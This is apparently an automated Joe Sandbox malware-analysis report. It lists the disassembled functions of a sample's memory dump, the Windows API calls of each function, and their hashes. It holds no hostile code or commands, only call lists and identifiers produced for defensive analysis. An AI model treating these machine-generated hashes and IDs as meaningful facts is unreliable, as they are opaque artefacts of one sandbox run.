                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                      • String ID: cdecl
                                                                                                                                                                                      • API String ID: 4031866154-3896280584
                                                                                                                                                                                      • Opcode ID: 94372c2debb82852ae17e44ee585aed67cc8fb19cee06a241310e7c68f439d74
                                                                                                                                                                                      • Instruction ID: f571b95646acafb92d1dc54eafd08e43e2109ea6d3c33544107cf9d8243ef6ad
                                                                                                                                                                                      • Opcode Fuzzy Hash: 94372c2debb82852ae17e44ee585aed67cc8fb19cee06a241310e7c68f439d74
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8911E236114301AFDB15AF34EC59E7A77B8FF85350B80802AF806CB3A0EB319891D7A0
                                                                                                                                                                                      Function 0094713C Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 0094715C
                                                                                                                                                                                      • _memset.LIBCMT ref: 0094717D
                                                                                                                                                                                      • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 009471CF
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 009471D8
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1157408455-0
                                                                                                                                                                                      • Opcode ID: 26f601e8827c1fa0d9b46840fe3c2c34aabb325b69051516d4f64f7d8f5bb48e
                                                                                                                                                                                      • Instruction ID: b97eb20e6ad6899b810b7afabd973cc7686e6f2eba687f611acb8f9a2e3af17f
                                                                                                                                                                                      • Opcode Fuzzy Hash: 26f601e8827c1fa0d9b46840fe3c2c34aabb325b69051516d4f64f7d8f5bb48e
                                                                                                                                                                                      • Instruction Fuzzy Hash: BF11CA769052287AD7206BA5AC4DFEBBB7CEF45760F10459AF504E72D0D3744E808BA4
                                                                                                                                                                                      Function 009413D1 Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 009413EE
                                                                                                                                                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00941409
                                                                                                                                                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0094141F
                                                                                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 00941474
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3137044355-0
                                                                                                                                                                                      • Opcode ID: ae22bcaffba170eb1a6547612538ec801595971b96e65d1f2654c1a8b4328772
                                                                                                                                                                                      • Instruction ID: 6c3816c25316d76aeda1ed010f23e15b783841d29ccd095d4ce849a5a11f5e8e
                                                                                                                                                                                      • Opcode Fuzzy Hash: ae22bcaffba170eb1a6547612538ec801595971b96e65d1f2654c1a8b4328772
                                                                                                                                                                                      • Instruction Fuzzy Hash: A0214F75641309ABDB209F91DC88EDABBBCEF00744F00896AA55297160D774EA88DF51
                                                                                                                                                                                      Function 0093C265 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0093C285
                                                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0093C297
                                                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0093C2AD
                                                                                                                                                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0093C2C8
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                                                                      • Opcode ID: 2095910dc8daee279c8f3db9957206578596cda90a0ca0a1106889966d75fe5e
                                                                                                                                                                                      • Instruction ID: 0260b4158109137e9907ac5fd24fc2b0c9ff172c5e44d53e9581fc30c997e6c3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2095910dc8daee279c8f3db9957206578596cda90a0ca0a1106889966d75fe5e
                                                                                                                                                                                      • Instruction Fuzzy Hash: 89111C7A940618FFDB11DBD4CC85E9EBBB8FB48710F204091E614B7294D671AE10DB94
                                                                                                                                                                                      Function 00947C45 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 00947C6C
                                                                                                                                                                                      • MessageBoxW.USER32(?,?,?,?), ref: 00947C9F
                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00947CB5
                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00947CBC
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2880819207-0
                                                                                                                                                                                      • Opcode ID: fa60effc825008a1f4ef2eb78705ccbd02b6dc0ba0e65ff007ecfb678faf3bd9
                                                                                                                                                                                      • Instruction ID: 6e9c7c7d3f2e3a222f3230a8f9982a85a2f3f831a2d37d801adc969cfcd72646
                                                                                                                                                                                      • Opcode Fuzzy Hash: fa60effc825008a1f4ef2eb78705ccbd02b6dc0ba0e65ff007ecfb678faf3bd9
                                                                                                                                                                                      • Instruction Fuzzy Hash: CB110872A1C208BFD7159BA8EC48E9A7FAD9F44325F148215F455D33A0D77089049760
                                                                                                                                                                                      Function 0091C619 Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0091C657
                                                                                                                                                                                      • GetStockObject.GDI32(00000011), ref: 0091C66B
                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000030,00000000), ref: 0091C675
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3970641297-0
                                                                                                                                                                                      • Opcode ID: feeb55ae2688c6c88d233ba0c384421da4cee08b22e48836d3803a4fba221ff2
                                                                                                                                                                                      • Instruction ID: 9bcc8d507111a067e320d0b58da6e6adb73ada158324eaa8c19da62a9dcdba0f
                                                                                                                                                                                      • Opcode Fuzzy Hash: feeb55ae2688c6c88d233ba0c384421da4cee08b22e48836d3803a4fba221ff2
                                                                                                                                                                                      • Instruction Fuzzy Hash: 0711C4B260564DBFDF114FA09C44EEA7B6DFF09394F054111FA0452150D735DCA0EBA0
                                                                                                                                                                                      Function 009449D1 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0094354D,?,009445D5,?,00008000), ref: 009449EE
                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0094354D,?,009445D5,?,00008000), ref: 00944A13
                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0094354D,?,009445D5,?,00008000), ref: 00944A1D
                                                                                                                                                                                      • Sleep.KERNEL32(?,?,?,?,?,?,?,0094354D,?,009445D5,?,00008000), ref: 00944A50
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CounterPerformanceQuerySleep
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2875609808-0
                                                                                                                                                                                      • Opcode ID: 776ca56b06b19f7f3e6f97fe1d6c37703eda62af731cb1fc54199281113b20bc
                                                                                                                                                                                      • Instruction ID: 1e6e2e2a369ce095869ff05ebe5fcdf37569fbe6d6bbadefe0ec47845577133d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 776ca56b06b19f7f3e6f97fe1d6c37703eda62af731cb1fc54199281113b20bc
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A115731D4952CDBCF04AFE5DA88BEEBB78FF08751F000055E942B2280CB349590DBA9
                                                                                                                                                                                      Function 00935BA2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3016257755-0
                                                                                                                                                                                      • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                                                                                      • Instruction ID: 92eb2db583d8e7b0a4113c449e18f4b08662741640f9607f8265ef0b72ae92a0
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                                                                                      • Instruction Fuzzy Hash: F501483240064EBBCF165E88DC42CEE7F66FB5C354F5A8815FA5859031D636CAB2AF81
                                                                                                                                                                                      Function 009280E2 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0092869D: __getptd_noexit.LIBCMT ref: 0092869E
                                                                                                                                                                                      • __lock.LIBCMT ref: 0092811F
                                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 0092813C
                                                                                                                                                                                      • _free.LIBCMT ref: 0092814F
                                                                                                                                                                                      • InterlockedIncrement.KERNEL32(013A8800), ref: 00928167
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2704283638-0
                                                                                                                                                                                      • Opcode ID: 47107c12c8ed63737d5a1ac355415b02c2e7bfa472ce266b0a118be9532f76cd
                                                                                                                                                                                      • Instruction ID: 124220d3a0477637815dd099d8dba5d26f3130959e8596a1858dd615db3372e4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 47107c12c8ed63737d5a1ac355415b02c2e7bfa472ce266b0a118be9532f76cd
                                                                                                                                                                                      • Instruction Fuzzy Hash: F901C43190B631ABCB11AF65B80A7AA73A4BF44724F040109F814672DACF386852DBD2
                                                                                                                                                                                      Function 00928724 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • __lock.LIBCMT ref: 00928768
                                                                                                                                                                                        • Part of subcall function 00928984: __mtinitlocknum.LIBCMT ref: 00928996
                                                                                                                                                                                        • Part of subcall function 00928984: EnterCriticalSection.KERNEL32(00920127,?,0092876D,0000000D), ref: 009289AF
                                                                                                                                                                                      • InterlockedIncrement.KERNEL32(DC840F00), ref: 00928775
                                                                                                                                                                                      • __lock.LIBCMT ref: 00928789
                                                                                                                                                                                      • ___addlocaleref.LIBCMT ref: 009287A7
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1687444384-0
                                                                                                                                                                                      • Opcode ID: dd223a830b16a2d302bdd3e60ce196ffa1cc2bfc988de6ec9a52081a715310d7
                                                                                                                                                                                      • Instruction ID: 02e4ebcf6644a53ebed8ce5da1caab180fcd9abe8cd1b223487fa11bfc2824f8
                                                                                                                                                                                      • Opcode Fuzzy Hash: dd223a830b16a2d302bdd3e60ce196ffa1cc2bfc988de6ec9a52081a715310d7
                                                                                                                                                                                      • Instruction Fuzzy Hash: 61016D75416B10EFD720EFA5E90975AF7E4AF80325F20890EE499972A4CB70A640CB01
                                                                                                                                                                                      Function 0096E13E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _memset.LIBCMT ref: 0096E14D
                                                                                                                                                                                      • _memset.LIBCMT ref: 0096E15C
                                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,009C3EE0,009C3F24), ref: 0096E18B
                                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 0096E19D
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _memset$CloseCreateHandleProcess
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3277943733-0
                                                                                                                                                                                      • Opcode ID: cc5bb6ea29286763325fbf384b214c39e1f671d5a996325c145cfb790b5b889a
                                                                                                                                                                                      • Instruction ID: 49c85e47dd1a4e7d8e32d8daa5a316c2201ebc6cc59d844aea13b225dc4bc2b8
                                                                                                                                                                                      • Opcode Fuzzy Hash: cc5bb6ea29286763325fbf384b214c39e1f671d5a996325c145cfb790b5b889a
                                                                                                                                                                                      • Instruction Fuzzy Hash: B8F089F1D54310BFF3106765BC05FB77AACDB05394F00C425BA04D6192D3B65E1067A4
                                                                                                                                                                                      Function 00949C73 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 00949C7F
                                                                                                                                                                                        • Part of subcall function 0094AD14: _memset.LIBCMT ref: 0094AD49
                                                                                                                                                                                      • _memmove.LIBCMT ref: 00949CA2
                                                                                                                                                                                      • _memset.LIBCMT ref: 00949CAF
                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 00949CBF
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 48991266-0
                                                                                                                                                                                      • Opcode ID: ddeaf5c8f202d87ce5487250cbe78d78dce427725dac5d16cf1d126f2a0674c1
                                                                                                                                                                                      • Instruction ID: 1db5d53a4ee114a6990315655ff55ff9e5536c590d50cade801d3bd39084b70e
                                                                                                                                                                                      • Opcode Fuzzy Hash: ddeaf5c8f202d87ce5487250cbe78d78dce427725dac5d16cf1d126f2a0674c1
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2AF03A7A201004ABCB016F54EC85E8ABB29EF85320F08C066FE089E25BC735E811DBB5
                                                                                                                                                                                      Function 0096E83C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0091B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0091B5EB
                                                                                                                                                                                        • Part of subcall function 0091B58B: SelectObject.GDI32(?,00000000), ref: 0091B5FA
                                                                                                                                                                                        • Part of subcall function 0091B58B: BeginPath.GDI32(?), ref: 0091B611
                                                                                                                                                                                        • Part of subcall function 0091B58B: SelectObject.GDI32(?,00000000), ref: 0091B63B
                                                                                                                                                                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0096E860
                                                                                                                                                                                      • LineTo.GDI32(00000000,?,?), ref: 0096E86D
                                                                                                                                                                                      • EndPath.GDI32(00000000), ref: 0096E87D
                                                                                                                                                                                      • StrokePath.GDI32(00000000), ref: 0096E88B
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_900000_UNK_.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1539411459-0
                                                                                                                                                                                      • Opcode ID: fe2ff5a75150379f8fdde3380d43787db96c5faf4a9eceb2a0130da045bb2253
                                                                                                                                                                                      • Instruction ID: 712d6c3be2b08457814c43106051675752c82b991ec9494c6c73f5fee3439b90
                                                                                                                                                                                      • Opcode Fuzzy Hash: fe2ff5a75150379f8fdde3380d43787db96c5faf4a9eceb2a0130da045bb2253
                                                                                                                                                                                      • Instruction Fuzzy Hash: CEF0E23201A259BBDB122F54AC0DFCE3F9AAF06310F008100FA01651E1C3798551EF99
                                                                                                                                                                                      Function 0093D623 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0093D640
                                                                                                                                                                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 0093D653
                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 0093D65A
                                                                                                                                                                                      • AttachThreadInput.USER32(00000000), ref: 0093D661
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000002.00000002.2948347160.0000000000901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                                      • Associated: 00000002.00000002.2948259960.0000000000900000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.000000000098D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948564609.00000000009AE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948677845.00000000009BA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000002.00000002.2948713600.00000000009C4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
